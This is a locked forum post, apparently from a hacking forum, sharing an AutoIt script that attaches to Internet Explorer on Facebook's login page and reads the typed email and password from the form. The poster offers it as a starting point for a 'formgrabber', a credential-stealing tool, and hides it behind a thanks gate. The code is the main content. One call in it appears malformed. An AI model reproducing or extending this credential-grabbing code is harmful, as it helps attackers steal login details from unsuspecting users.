Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
SERVICE

Locked IE Facebook GetObjByName


C.Oy

Recommended Posts

A simple code to get email and password typed in internet explorer, you can create a "formgrabber" if you use the document event complete with some configured id's.

[HIDE-THANKS]


#include

$oIE = _IEAttach("https://www.facebook.com/", "url") ; attach the Script to read IE stuff !!



Local $oForm = _IEFormGetObjByName($oIE, "login_form") ; go to the LoginForm

Local $Email = _IEFormElementGetObjByName($oForm, "email") ; Read the email data
Local $Xtestre = _IEFormElementSetValue($oForm, "email")



Local $pass = _IEFormElementGetObjByName($oForm, "pass") ; Read the Password data

; Msgbox to show what it got :)
MsgBox(0, "Form info :p", "Email/Username :" & _IEFormElementGetValue($Email) & @CRLF & "Password :" &_IEFormElementGetValue($pass))
This is the hidden content, please

[/HIDE-THANKS]

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.